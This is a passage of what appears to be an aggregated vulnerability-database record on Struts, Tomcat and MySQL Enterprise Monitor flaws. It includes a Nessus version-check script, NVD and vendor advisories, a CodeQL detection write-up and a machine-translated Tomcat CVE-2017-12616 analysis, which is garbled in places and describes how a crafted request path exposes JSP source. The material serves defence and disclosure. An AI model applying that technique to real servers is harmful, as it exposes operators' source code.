\"3.2.9.2249\"\n };\n\nvuln = FALSE;\nfix = '';\nforeach (prefix in keys(fixes))\n{\n if (version =~ prefix && ver_compare(ver:version,\n fix:fixes[prefix],\n strict:FALSE) < 0)\n {\n vuln = TRUE;\n fix = fixes[prefix];\n break;\n }\n}\n\nif (vuln)\n{\n report =\n '\\n URL : ' + install_url +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix +\n '\\n';\n security_report_v4(port:port, severity:SECURITY_WARNING, extra:report);\n}\nelse audit(AUDIT_WEB_APP_NOT_AFFECTED, app, install_url, version);\n", "naslFamily": "CGI abuses", "pluginID": "103536", "cpe": ["cpe:/a:oracle:mysql_enterprise_monitor"], "scheme": null}

{"cve": [{"lastseen": "2019-10-04T12:18:46", "bulletinFamily": "NVD", "description": "Vulnerability in the MySQL Enterprise Monitor component of Oracle MySQL (subcomponent: Monitoring: Web). Supported versions that are affected are 3.2.8.2223 and earlier, 3.3.4.3247 and earlier and 3.4.2.4181 and earlier. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise MySQL Enterprise Monitor. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in takeover of MySQL Enterprise Monitor. CVSS 3.0 Base Score 8.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H).", "modified": "2019-10-03T00:03:00", "id": "CVE-2017-10424", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-10424", "published": "2017-10-19T17:29:00", "title": "CVE-2017-10424", "type": "cve", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-10-04T12:19:27", "bulletinFamily": "NVD", "description": "When using a Spring AOP functionality to secure Struts actions it is possible to perform a DoS attack. Solution is to upgrade to Apache Struts version 2.5.12 or 2.3.33.", "modified": "2019-10-03T00:03:00", "id": "CVE-2017-9787", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-9787", "published": "2017-07-13T15:29:00", "title": "CVE-2017-9787", "type": "cve", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-08-13T11:53:46", "bulletinFamily": "NVD", "description": "The REST Plugin in Apache Struts 2.1.1 through 2.3.x before 2.3.34 and 2.5.x before 2.5.13 uses an XStreamHandler with an instance of XStream for deserialization without any type filtering, which can lead to Remote Code Execution when deserializing XML payloads.", "modified": "2019-08-12T21:15:00", "id": "CVE-2017-9805", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-9805", "published": "2017-09-15T19:29:00", "title": "CVE-2017-9805", "type": "cve", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-02-14T14:38:44", "bulletinFamily": "NVD", "description": "The error page mechanism of the Java Servlet Specification requires that, when an error occurs and an error page is configured for the error that occurred, the original request and response are forwarded to the error page. This means that the request is presented to the error page with the original HTTP method. If the error page is a static file, expected behaviour is to serve content of the file as if processing a GET request, regardless of the actual HTTP method. The Default Servlet in Apache Tomcat 9.0.0.M1 to 9.0.0.M20, 8.5.0 to 8.5.14, 8.0.0.RC1 to 8.0.43 and 7.0.0 to 7.0.77 did not do this. Depending on the original request this could lead to unexpected and undesirable results for static error pages including, if the DefaultServlet is configured to permit writes, the replacement or removal of the custom error page. Notes for other user provided error pages: (1) Unless explicitly coded otherwise, JSPs ignore the HTTP method. JSPs used as error pages must must ensure that they handle any error dispatch as a GET request, regardless of the actual method. (2) By default, the response generated by a Servlet does depend on the HTTP method. Custom Servlets used as error pages must ensure that they handle any error dispatch as a GET request, regardless of the actual method.", "modified": "2019-10-03T00:03:00", "id": "CVE-2017-5664", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-5664", "published": "2017-06-06T14:29:00", "title": "CVE-2017-5664", "type": "cve", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}], "f5": [{"lastseen": "2019-05-23T22:31:56", "bulletinFamily": "software", "description": "\nF5 Product Development has evaluated the currently supported releases for potential vulnerability.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct | Versions known to be vulnerable | Versions known to be not vulnerable | Severity | CVSSv3 score | Vulnerable component or feature \n---|---|---|---|---|--- \nBIG-IP LTM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.5.1 - 11.6.2 \n11.2.1 | Not vulnerable | None | None \nBIG-IP AAM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.5.1 - 11.6.2 | Not vulnerable | None | None \nBIG-IP AFM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.5.1 - 11.6.2 | Not vulnerable | None | None \nBIG-IP Analytics | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.5.1 - 11.6.2 \n11.2.1 | Not vulnerable | None | None \nBIG-IP APM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.5.1 - 11.6.2 \n11.2.1 | Not vulnerable | None | None \nBIG-IP ASM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.5.1 - 11.6.2 \n11.2.1 | Not vulnerable | None | None \nBIG-IP DNS | None | 13.0.0 \n12.0.0 - 12.1.2 | Not vulnerable | None | None \nBIG-IP Edge Gateway | None | 11.2.1 | Not vulnerable | None | None \nBIG-IP GTM | None | 11.5.1 - 11.6.2 \n11.2.1 | Not vulnerable | None | None \nBIG-IP Link Controller | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.5.1 - 11.6.2 \n11.2.1 | Not vulnerable | None | None \nBIG-IP PEM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.5.1 - 11.6.2 | Not vulnerable | None | None \nBIG-IP WebAccelerator | None | 11.2.1 | Not vulnerable | None | None \nF5 WebSafe | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.6.2 | Not vulnerable | None | None \nARX | None | 6.2.0 - 6.4.0 | Not vulnerable | None | None \nEnterprise Manager | None | 3.1.1 | Not vulnerable | None | None \nBIG-IQ Cloud | None | 4.4.0 - 4.5.0 | Not vulnerable | None | None \nBIG-IQ Device | None | 4.4.0 - 4.5.0 | Not vulnerable | None | None \nBIG-IQ Security | None | 4.4.0 - 4.5.0 | Not vulnerable | None | None \nBIG-IQ ADC | None | 4.5.0 | Not vulnerable | None | None \nBIG-IQ Centralized Management | None | 5.0.0 - 5.3.0 \n4.6.0 | Not vulnerable | None | None \nBIG-IQ Cloud and Orchestration | None | 1.0.0 | Not vulnerable | None | None \nF5 iWorkflow | None | 2.0.0 - 2.3.0 | Not vulnerable | None | None \nLineRate | None | 2.5.0 - 2.6.2 | Not vulnerable | None | None \nTraffix SDC | None | 5.0.0 - 5.1.0 \n4.0.0 - 4.4.0 | Not vulnerable | None | None\n\nNone\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n", "modified": "2017-11-21T03:01:00", "published": "2017-11-21T03:01:00", "id": "F5:K51433470", "href": "https://support.f5.com/csp/article/K51433470", "title": "MySQL vulnerability CVE-2017-10424", "type": "f5", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-08-17T11:09:06", "bulletinFamily": "software", "description": "\nF5 Product Development has evaluated the currently supported releases for potential vulnerability.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct| Versions known to be vulnerable| Versions known to be not vulnerable| Severity| Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.1 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP AAM| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.1 - 11.6.1| Not vulnerable| None \nBIG-IP AFM| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.1 - 11.6.1| Not vulnerable| None \nBIG-IP Analytics| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.1 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP APM| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.1 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP ASM| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.1 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP DNS| None| 13.0.0 \n12.0.0 - 12.1.2| Not vulnerable| None \nBIG-IP Edge Gateway| None| 11.2.1| Not vulnerable| None \nBIG-IP GTM| None| 11.4.1 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP Link Controller| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.1 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP PEM| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.1 - 11.6.1| Not vulnerable| None \nBIG-IP PSM| None| 11.4.1| Not vulnerable| None \nBIG-IP WebAccelerator| None| 11.2.1| Not vulnerable| None \nBIG-IP WebSafe| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.6.0 - 11.6.1| Not vulnerable| None \nARX| None| 6.2.0 - 6.4.0| Not vulnerable| None \nEnterprise Manager| None| 3.1.1| Not vulnerable| None \nBIG-IQ Cloud| None| 4.4.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Device| None| 4.4.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Security| None| 4.4.0 - 4.5.0| Not vulnerable| None \nBIG-IQ ADC| None| 4.5.0| Not vulnerable| None \nBIG-IQ Centralized Management| None| 5.0.0 - 5.3.0 \n4.6.0| Not vulnerable| None \nBIG-IQ Cloud and Orchestration| None| 1.0.0| Not vulnerable| None \nF5 iWorkflow| None| 2.0.0 - 2.2.0| Not vulnerable| None \nLineRate| None| 2.5.0 - 2.6.2| Not vulnerable| None \nTraffix SDC| None| 5.0.0 - 5.1.0 \n4.0.0 - 4.4.0| Not vulnerable| None\n\nNone\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n", "modified": "2017-07-24T20:20:00", "published": "2017-07-24T20:20:00", "href": "https://support.f5.com/csp/article/K86300800", "id": "F5:K86300800", "title": "Apache Struts 2 vulnerability CVE-2017-9787", "type": "f5", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2019-04-30T18:21:14", "bulletinFamily": "software", "description": "\nF5 Product Development has evaluated the currently supported releases for potential vulnerability.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct| Versions known to be vulnerable| Versions known to be not vulnerable| Severity| Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP AAM| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP AFM| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP Analytics| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP APM| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP ASM| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP DNS| None| 13.0.0 \n12.0.0 - 12.1.2| Not vulnerable| None \nBIG-IP Edge Gateway| None| 11.2.1| Not vulnerable| None \nBIG-IP GTM| None| 11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP Link Controller| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP PEM| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP PSM| None| 11.4.0 - 11.4.1| Not vulnerable| None \nBIG-IP WebAccelerator| None| 11.2.1| Not vulnerable| None \nBIG-IP WebSafe| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.6.0 - 11.6.1| Not vulnerable| None \nARX| None| 6.2.0 - 6.4.0| Not vulnerable| None \nEnterprise Manager| None| 3.1.1| Not vulnerable| None \nBIG-IQ Cloud| None| 4.4.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Device| None| 4.4.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Security| None| 4.4.0 - 4.5.0| Not vulnerable| None \nBIG-IQ ADC| None| 4.5.0| Not vulnerable| None \nBIG-IQ Centralized Management| None| 5.0.0 - 5.2.0 \n4.6.0| Not vulnerable| None \nBIG-IQ Cloud and Orchestration| None| 1.0.0| Not vulnerable| None \nF5 iWorkflow| None| 2.0.0 - 2.2.0| Not vulnerable| None \nLineRate| None| 2.5.0 - 2.6.2| Not vulnerable| None \nTraffix SDC| None| 5.0.0 - 5.1.0 \n4.0.0 - 4.4.0| Not vulnerable| None\n\nNone\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n", "modified": "2017-06-23T23:18:00", "published": "2017-06-23T23:18:00", "id": "F5:K01225001", "href": "https://support.f5.com/csp/article/K01225001", "title": "Apache Tomcat vulnerability CVE-2017-5664", "type": "f5", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2020-02-24T20:34:35", "bulletinFamily": "software", "description": "\nF5 Product Development has evaluated the currently supported releases for potential vulnerability.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table.\n\nProduct | Versions known to be vulnerable | Versions known to be not vulnerable | Severity | Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1 | Not vulnerable | None \nBIG-IP AAM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 | Not vulnerable | None \nBIG-IP AFM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 | Not vulnerable | None \nBIG-IP Analytics | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1 | Not vulnerable | None \nBIG-IP APM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1 | Not vulnerable | None \nBIG-IP ASM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1 | Not vulnerable | None \nBIG-IP DNS | None | 13.0.0 \n12.0.0 - 12.1.2 | Not vulnerable | None \nBIG-IP Edge Gateway | None | 11.2.1 | Not vulnerable | None \nBIG-IP GTM | None | 11.4.0 - 11.6.1 \n11.2.1 | Not vulnerable | None \nBIG-IP Link Controller | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1 | Not vulnerable | None \nBIG-IP PEM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 | Not vulnerable | None \nBIG-IP PSM | None | 11.4.0 - 11.4.1 \n11.2.1 | Not vulnerable | None \nBIG-IP WebAccelerator | None | 11.2.1 | Not vulnerable | None \nBIG-IP WebSafe | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.6.0 - 11.6.1 | Not vulnerable | None \nARX | None | 6.2.0 - 6.4.0 | Not vulnerable | None \nEnterprise Manager | None | 3.1.1 | Not vulnerable | None \nBIG-IQ Cloud | None | 4.4.0 - 4.5.0 | Not vulnerable | None \nBIG-IQ Device | None | 4.4.0 - 4.5.0 | Not vulnerable | None \nBIG-IQ Security | None | 4.4.0 - 4.5.0 | Not vulnerable | None \nBIG-IQ ADC | None | 4.5.0 | Not vulnerable | None \nBIG-IQ Centralized Management | None | 5.0.0 - 5.3.0 \n4.6.0 | Not vulnerable | None \nBIG-IQ Cloud and Orchestration | None | 1.0.0 | Not vulnerable | None \nF5 iWorkflow | None | 2.0.0 - 2.2.0 | Not vulnerable | None \nLineRate | None | 2.5.0 - 2.6.2 | Not vulnerable | None \nTraffix SDC | None | 5.0.0 - 5.1.0 \n4.0.0 - 4.4.0 | Not vulnerable | None\n\nMitigating the Apache vulnerability using BIG-IP ASM attack signatures\n\n**Impact of action**: Performing the following action should not have a negative impact on your system.\n\nThe BIG-IP ASM system offers zero-day protection for any Apache servers affected by this vulnerability through ASM Signatures 200003440 and 200004174.\n\nFor more information, refer to the following resources:\n\n * [Apache Struts 2 REST plugin Remote Code Execution (CVE-2017-9805)](<https://devcentral.f5.com/articles/apache-struts-2-rest-plugin-remote-code-execution-cve-2017-9805-27714>)\n\n**Note**: A DevCentral login is required to access this content.\n\n * <https://cwiki.apache.org/confluence/display/WW/S2-052>\n\n**Note**: The previous link takes you to a resource outside of AskF5. The third-party could remove the document without our knowledge.\n\n * [K8217: Managing BIG-IP ASM attack signatures](<https://support.f5.com/csp/article/K8217>)\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n", "modified": "2018-08-28T21:20:00", "published": "2017-09-07T00:20:00", "id": "F5:K84144321", "href": "https://support.f5.com/csp/article/K84144321", "title": "Apache Struts vulnerability CVE-2017-9805", "type": "f5", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "seebug": [{"lastseen": "2017-11-19T12:02:40", "bulletinFamily": "exploit", "description": "In this post I'll describe how I customized a standard lgtm query to find a remote code execution vulnerability in [Apache Struts](https://struts.apache.org/). A more general announcement about this vulnerability [can be found here](https://lgtm.com/blog/apache_struts_CVE-2017-9805_announcement). It has been assigned [CVE-2017-9805](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9805), a security bulletin can be found here on the Struts website, and details of version 2.5.13 of Apache Struts that addresses this vulnerability [are available here](https://struts.apache.org/announce.html). Due to the severe nature of this vulnerability, a couple of details (including a working exploit) have been omitted from this post; this information will be added in a few weeks' time.\r\n\r\nWe strongly advise users of Struts to upgrade to the latest version to mitigate this security risk.\r\n\r\nThe vulnerability I discovered is a result of unsafe deserialization in Java. Multiple similar vulnerabilities have come to light in recent years, after Chris Frohoff and Gabriel Lawrence discovered a deserialization flaw in Apache Commons Collections that can lead to arbitrary code execution. Many Java applications have since been affected by such vulnerabilities. If you'd like to know more about this type of vulnerability, the lgtm documentation page on this topic is a good place to start.\r\n# Detecting unsafe deserialization in Struts #\r\n\r\nlgtm identifies alerts in code using queries written in a specially-designed language: QL. One of the many queries for Java detects potentially unsafe deserialization of user-controlled data. The query identifies situations in which unsanitized data is deserialized into a Java object. This includes data that comes from an HTTP request or from any other socket connection.\r\n\r\nThis query detects common ways through which user-controlled data flows to a deserialization method. However, some projects use a slightly different approach to receive remote user input. For example, Apache Struts uses the ContentTypeHandler interface. This converts data into Java objects. Since implementations of this interface usually deserialize the data passed to them, every class that implements this interface is potentially of interest. The standard QL query for detecting unsafe deserialization of user-controlled data can easily be adapted to recognize this additional method for processing user input. This is done by defining a custom data source.\r\n\r\nIn this case, we are interested in data flowing from the toObject method, which is defined in the ContentTypeHandler interface:\r\n\r\n void toObject(Reader in, Object target);\r\n\r\nThe data contained in the first argument in that is passed to toObject should be considered tainted: it is under the control of a remote user and should not be trusted. We want to find places where this tainted data (the source) flows into a deserialization method (a sink) without input validation or sanitization.\r\n\r\nThe QL DataFlow library provides functionality for tracking tainted data through various steps in the source code. This is known as taint tracking. For example, data gets tracked through various method calls:\r\n\r\n IOUtils.copy(remoteUserInput, output); // output is now also tainted because the function copy preserves the data.\r\n\r\nTo make use of the taint tracking functionality in the DataFlow library, let's define the in argument to ContentTypeHandler.toObject(...) as a tainted source. First, we define how the query should recognize the ContentTypeHandler interface and the method toObject.\r\n\r\n\t/** The ContentTypeHandler Java class in Struts **/\r\n\tclass ContentTypeHandler extends Interface {\r\n\t ContentTypeHandler() {\r\n\t this.hasQualifiedName(\"org.apache.struts2.rest.handler\", \"ContentTypeHandler\")\r\n\t }\r\n\t}\r\n\t\r\n\t/** The method `toObject` */\r\n\tclass ToObjectDeserializer extends Method {\r\n\t ToObjectDeserializer() {\r\n\t this.getDeclaringType().getASupertype*() instanceof ContentTypeHandler and\r\n\t this.getSignature = \"toObject(java.io.Reader,java.lang.Object)\"\r\n\t }\r\n\t}\r\n\r\nHere we use getASupertype*() to restrict the matching to any class that has ContentTypeHandler as a supertype.\r\n\r\nNext we want to mark the first argument of the toObject method as an untrusted data source, and track that data as it flows through the code paths. To do that, we extend the FlowSource class in QL's dataflow library:\r\n\r\n\t/** Mark the first argument of `toObject` as a dataflow source **/\r\n\tclass ContentTypeHandlerInput extends FlowSource {\r\n\t ContentTypeHandlerInput() {\r\n\t exists(ToObjectDeserializer des |\r\n\t des.getParameter(0).getAnAccess() = this\r\n\t )\r\n\t }\r\n\t}\r\n\r\nIntuitively, this definition says that any access to the first parameter of a toObject method, as captured by ToObjectDeserializer above, is a flow source. Note that for technical reasons, flow sources have to be expressions. Therefore, we identify all accesses of that parameter (which are expressions) as sources, rather than the parameter itself (which isn't).\r\n\r\nNow that we have the definition for a dataflow source, we can look for places where this tainted data is used in an unsafe deserialization method. We don't have to define that method (the sink) ourselves as it is already in the Deserialization of user-controlled data query (line 64: UnsafeDeserializationSink, we will need to copy its definition into the query console). Using this, our final query becomes:\r\n\r\n\tfrom ContentTypeHandlerInput source, UnsafeDeserializationSink sink\r\n\twhere source.flowsTo(sink)\r\n\tselect source, sink\r\n\r\nHere we use the .flowsTo predicate in FlowSource for tracking so that we only identify the cases when unsafe deserialization is performed on a ContentTypeHandlerInput source.\r\n\r\nWhen I ran the customized query on Struts there was exactly one result (Running it now will yield no result as the fix has been applied). I verified that it was a genuine remote code execution vulnerability before reporting it to the Struts security team. They have been very quick and responsive in working out a solution even though it is a fairly non-trivial task that requires API changes. Due to the severity of this finding I will not disclose more details at this stage. Rather, I will update this blog post in a couple of weeks' time with more information.\r\n# Vendor Response #\r\n\r\n 17 July 2017: Initial disclosure.\r\n 02 August 2017: API changes in preparation for patch.\r\n 14 August 2017: Patch from Struts for review.\r\n 16 August 2017: Vulnerability officially recognized as CVE-2017-9805\r\n 5 September 2017: Struts version 2.5.13 released\r\n\r\n# Mitigate unsafe deserialization risk with lgtm #\r\n\r\nlgtm runs the standard Deserialization of user-controlled data query on all Java projects. If your project uses deserialization frameworks detected by that query, and has user-controlled data reaching a deserialization method, you may see relevant alerts for this query on lgtm.com. Check any results carefully. You can also enable lgtm's pull request integration to prevent serious security issues like these from being merged into the code base in the first place.\r\n\r\nIf your project uses other deserialization frameworks, then you can use the query console to create your own custom version of the standard query.", "modified": "2017-09-06T00:00:00", "published": "2017-09-06T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-96420", "id": "SSV:96420", "type": "seebug", "title": "Apache Struts2 S2-052 (CVE-2017-9805)", "sourceData": "", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": ""}, {"lastseen": "2017-11-19T12:00:51", "bulletinFamily": "exploit", "description": "### Several recent Tomcat CVE\n\n * CVE-2017-5664 Tomcat Security Constraint Bypass\n * CVE-2017-12615 remote code execution vulnerability\n * CVE-2017-12616 information disclosure vulnerability\n\n### Common\n\nIs tasteless With JspServlet and DefaultServlet about the system.\n\nCVE-2017-12615 this remote code execution are everywhere, and it seems like no one is watching CVE-2017-12616 cause JSP source code leakage problems. Here simply write about it.\n\nCVE-2017-12616\n\n### Requirements\n\nTarget the use of VirtualDirContext to mount the virtual directory. Mount the virtual catalog of the demand should still have some, so should be larger than the opening and PUT the probability to be larger, but is also tasteless.\n\n### A brief analysis\n\nTo cause Jsp source code disclosure, definitely need to let the DefaultServlet to handle jsp requests. Tomcat use similar JNDI way to manage Web resources, JSP, static file, Class, etc. By default, resources by FileDirContext to manage. And the use of VirtualDirContext mount the virtual catalog, is by the VirtualDirContext to manage.\n\nThrough the similar to CVE-2017-12615 use way to access the virtual directory of resources, allowing the request by the DefaultServlet processing, the Tomcat from VirtualDirContext management of resources to obtain access to the jsp files through the doLookup method, directly to the content returned, resulting in source code disclosure.\n\nWhy only the virtual directory for the existence of this vulnerability? Because of the non-virtual directory default by FileDirContext management. FileDirContext in the presence of a named file check method. `` protected File file(String name) {\n \n \n File file = new File(base, name);\n if (file. the exists() && file. the canRead()) {\n \n if (allowLinking)\n return file;\n \n // Check that this file belongs to our root path\n String canPath = null;\n try {\n canPath = file. getCanonicalPath();\n } catch (IOException e) {\n // Ignore\n }\n if (canPath == null)\n return null;\n \n // Check to see if going outside of the web application root\n if (! canPath. startsWith(absoluteBase)) {\n return null;\n }\n \n // Case sensitivity check - this is now always done\n String fileAbsPath = file. getAbsolutePath();\n if (fileAbsPath. endsWith(\".\"))\n fileAbsPath = fileAbsPath + \"/\";\n String absPath = normalize(fileAbsPath);\n canPath = normalize(canPath);\n if ((absoluteBase. length() < absPath. length())\n && (absoluteBase. length() < canPath. length())) {\n absPath = absPath. substring(absoluteBase. length() + 1);\n if (absPath. equals(\"\"))\n absPath = \"/\";\n canPath = canPath. substring(absoluteBase. length() + 1);\n if (canPath. equals(\"\"))\n canPath = \"/\";\n if (! canPath. equals(absPath))\n return null;\n }\n \n } else {\n return null;\n }\n return file;\n \n\n} ``\n\nThis method can not prevent /a. jsp/ this URL, but DefaultServlet then have a check at the end of the/, leading to / Can't be used.\n\nAnd the new version of the fix mode is also the code for the small-scale reconstruction, the above method of checking the disassembly to called the validate method, and re-wrote VirtualDirContext in a lot of method, call the validate access to the file to be checked.\n\n### Use\n\nWith CVE-2017-12615 similar, to achieve the view Jsp file source code of the effect.\n", "modified": "2017-09-21T00:00:00", "published": "2017-09-21T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-96562", "id": "SSV:96562", "type": "seebug", "title": "Tomcat information disclosure Vulnerability(CVE-2017-12616 )analysis", "sourceData": "", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": ""}], "cloudfoundry": [{"lastseen": "2019-05-29T18:33:00", "bulletinFamily": "software", "description": "# \n\n# **Severity**\n\nAdvisory/Critical\n\n# **Vendor**\n\nApache\n\n# **Versions Affected**\n\n * Apache Struts 2:\n * 2.3.x versions prior to 2.3.34\n * 2.5.x versions prior to 2.5.13\n\n# **Description**\n\nAn RCE attack is possible when using the Struts REST plugin with XStream handler to deserialise XML requests [1].\n\n# **Affected Cloud Foundry Products and Versions**\n\n * The Cloud Foundry team has determined that core releases do not package Apache Struts.\n * However, particular applications deployed on Cloud Foundry may depend on Apache Struts 2. This vulnerability should be mitigated on the application level as soon as possible by following the steps outlined in the Struts documentation [1].\n\n# **Mitigation**\n\n * The Cloud Foundry team has determined that the project is not exposed to this particular vulnerability and therefore does not require any Cloud Foundry-specific upgrades.\n * However, particular applications deployed on Cloud Foundry may depend on Apache Struts 2. This vulnerability should be mitigated on the application level as soon as possible by following the steps outlined in the Struts documentation [1].\n\n# **Credit**\n\nMan Yue Mo\n\n# **References**\n\n[1] [https://struts.apache.org/docs/s2-052.html](<https://struts.apache.org/docs/s2-052.html>)\n\n[2] <https://struts.apache.org/announce.html#a20170907>\n\n[3] <https://struts.apache.org/announce.html#a20170905>\n", "modified": "2017-09-08T00:00:00", "published": "2017-09-08T00:00:00", "id": "CFOUNDRY:3B3A927B1B8E5A80A8EA38A6AACF98EE", "href": "https://www.cloudfoundry.org/blog/cve-2017-9805/", "title": "CVE-2017-9805: Apache Struts Remote Code Execution | Cloud Foundry", "type": "cloudfoundry", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "pentestit": [{"lastseen": "2017-09-07T06:14:05", "bulletinFamily": "blog", "description": "PenTestIT RSS Feed\n\nThere is a saying making rounds now that \"Apache Struts is like the WebGoat of all frameworks\" and the current exploit which is being tracked under **CVE-2017-9805** and the Apache Struts bulletin - 